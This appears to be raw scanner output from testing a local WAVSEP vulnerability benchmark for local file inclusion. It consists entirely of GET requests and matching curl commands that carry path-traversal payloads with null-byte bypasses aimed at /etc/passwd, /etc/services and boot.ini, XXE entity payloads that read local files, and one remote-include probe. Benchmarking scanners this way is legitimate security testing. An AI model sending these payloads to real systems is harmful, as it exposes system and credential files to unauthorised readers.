curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case20-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
